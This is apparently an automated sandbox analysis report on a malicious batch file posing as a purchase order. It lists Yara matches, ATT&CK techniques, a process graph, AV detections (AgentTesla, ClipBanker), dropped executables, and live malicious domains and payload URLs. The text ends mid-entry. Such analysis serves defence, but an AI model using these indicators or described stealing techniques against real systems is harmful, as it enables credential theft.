                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      1
                      Valid Accounts
                      131
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      21
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      1
                      Taint Shared Content
                      1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Valid Accounts
                      1
                      Deobfuscate/Decode Files or Information
                      11
                      Input Capture
                      1
                      System Network Connections Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      1
                      Valid Accounts
                      1
                      Access Token Manipulation
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      311
                      Process Injection
                      1
                      Timestomp
                      NTDS47
                      System Information Discovery
                      Distributed Component Object Model11
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job
                      21
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      LSA Secrets1
                      Query Registry
                      SSH1
                      Clipboard Data
                      123
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                      Registry Run Keys / Startup Folder
                      311
                      Masquerading
                      Cached Domain Credentials441
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Valid Accounts
                      DCSync1
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem151
                      Virtualization/Sandbox Evasion
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection
                      Network Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560318 Sample: RFQ_PO_N39859JFK_ORDER_SPEC... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 107 s82.gocheapweb.com 2->107 109 gxe0.com 2->109 111 api.ipify.org 2->111 141 Found malware configuration 2->141 143 Malicious sample detected (through community Yara rule) 2->143 145 Antivirus detection for dropped file 2->145 147 12 other signatures 2->147 11 cmd.exe 1 2->11         started        13 Wisrysxl.PIF 2->13         started        16 Wisrysxl.PIF 2->16         started        18 2 other processes 2->18 signatures3 process4 signatures5 20 x.exe 1 7 11->20         started        25 extrac32.exe 8 11->25         started        27 conhost.exe 11->27         started        177 Antivirus detection for dropped file 13->177 179 Multi AV Scanner detection for dropped file 13->179 181 Machine Learning detection for dropped file 13->181 183 Allocates many large memory junks 13->183 29 lxsyrsiW.pif 13->29         started        185 Writes to foreign memory regions 16->185 187 Allocates memory in foreign processes 16->187 189 Sample uses process hollowing technique 16->189 31 lxsyrsiW.pif 16->31         started        process6 dnsIp7 113 gxe0.com 198.252.105.91, 443, 49712, 49713 HAWKHOSTCA Canada 20->113 99 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 20->99 dropped 101 C:\Users\Public\Wisrysxl.url, MS 20->101 dropped 103 C:\Users\Public\Libraries\Wisrysxl, data 20->103 dropped 169 Antivirus detection for dropped file 20->169 171 Multi AV Scanner detection for dropped file 20->171 173 Machine Learning detection for dropped file 20->173 175 6 other signatures 20->175 33 lxsyrsiW.pif 4 20->33         started        37 cmd.exe 1 20->37         started        39 esentutl.exe 2 20->39         started        105 C:\Users\user\AppData\Local\Temp\x.exe, PE32 25->105 dropped 41 conhost.exe 27->41         started        43 neworigin.exe 29->43         started        45 server_BTC.exe 29->45         started        47 neworigin.exe 31->47         started        49 server_BTC.exe 31->49         started        file8 signatures9 process10 file11 85 C:\Users\user\AppData\...\server_BTC.exe, PE32 33->85 dropped 87 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 33->87 dropped 89 C:\Program Files (x86)\...\armsvc.exe, PE32 33->89 dropped 119 Drops executable to a common third party application directory 33->119 121 Infects executable files (exe, dll, sys, html) 33->121 51 server_BTC.exe 7 33->51         started        55 neworigin.exe 15 2 33->55         started        58 esentutl.exe 2 37->58         started        60 esentutl.exe 2 37->60         started        62 conhost.exe 37->62         started        91 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 39->91 dropped 64 conhost.exe 39->64         started        123 Installs a global keyboard hook 43->123 125 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 47->125 127 Tries to steal Mail credentials (via file / registry access) 47->127 129 Tries to harvest and steal ftp login credentials 47->129 131 Tries to harvest and steal browser information (history, passwords, etc) 47->131 signatures12 process13 dnsIp14 93 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 51->93 dropped 149 Antivirus detection for dropped file 51->149 151 Multi AV Scanner detection for dropped file 51->151 153 Machine Learning detection for dropped file 51->153 167 2 other signatures 51->167 66 TrojanAIbot.exe 51->66         started        69 powershell.exe 51->69         started        71 cmd.exe 51->71         started        73 schtasks.exe 51->73         started        115 s82.gocheapweb.com 51.195.88.199, 49749, 49769, 49781 OVHFR France 55->115 117 api.ipify.org 104.26.13.205, 443, 49742, 49775 CLOUDFLARENETUS United States 55->117 155 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 55->155 157 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 55->157 159 Tries to steal Mail credentials (via file / registry access) 55->159 95 C:\Users\Public\alpha.pif, PE32 58->95 dropped 161 Drops PE files to the user root directory 58->161 163 Drops PE files with a suspicious file extension 58->163 165 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 58->165 97 C:\Users\Public\xpha.pif, PE32 60->97 dropped file15 signatures16 process17 signatures18 133 Antivirus detection for dropped file 66->133 135 Multi AV Scanner detection for dropped file 66->135 137 Machine Learning detection for dropped file 66->137 139 Loading BitLocker PowerShell Module 69->139 75 conhost.exe 69->75         started        77 WmiPrvSE.exe 69->77         started        79 conhost.exe 71->79         started        81 timeout.exe 71->81         started        83 conhost.exe 73->83         started        process19

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat24%ReversingLabsWin32.Trojan.Malcab
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%AviraHEUR/AGEN.1311721
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                      C:\Users\Public\Libraries\Wisrysxl.PIF100%AviraHEUR/AGEN.1325995
                      C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1325995
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF29%ReversingLabs
                      C:\Users\Public\Libraries\lxsyrsiW.pif3%ReversingLabs
                      C:\Users\Public\alpha.pif0%ReversingLabs
                      C:\Users\Public\xpha.pif0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\neworigin.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\x.exe29%ReversingLabs
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://gxe0.com/yak/233_Wisrysx0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_WisrysxlfsseV0%Avira URL Cloudsafe
                      https://gxe0.com:443/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      http://s82.gocheapweb.com0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gxe0.com
                      198.252.105.91
                      truefalse
                        high
                        api.ipify.org
                        104.26.13.205
                        truefalse
                          high
                          s82.gocheapweb.com
                          51.195.88.199
                          truefalse
                            high
                            s-part-0035.t-0009.t-msedge.net
                            13.107.246.63
                            truefalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                                high
                                https://gxe0.com/yak/233_Wisrysxlfsstrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://gxe0.com/yak/233_Wisrysxx.exe, 00000004.00000002.1522045362.0000000020DAD000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://sectigo.com/CPS0x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://account.dyn.com/neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmpfalse
                                        high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.sectigo.com0x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://r11.o.lencr.org0#neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://gxe0.com/yak/233_WisrysxlfsseVx.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.ipify.org/tneworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://gxe0.com/x.exe, 00000004.00000002.1464571050.0000000000696000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://r11.i.lencr.org/0neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.ipify.orgneworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.micropowershell.exe, 00000010.00000002.1551553255.0000000003098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/0neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://s82.gocheapweb.comneworigin.exe, 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://gxe0.com:443/yak/233_Wisrysxlfssx.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameneworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.pmail.comx.exe, x.exe, 00000004.00000002.1532108594.000000002215C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1551725897.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1474717040.0000000002969000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.000000000296A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1533707068.00000000224BF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1532108594.00000000220FC000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1460918263.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 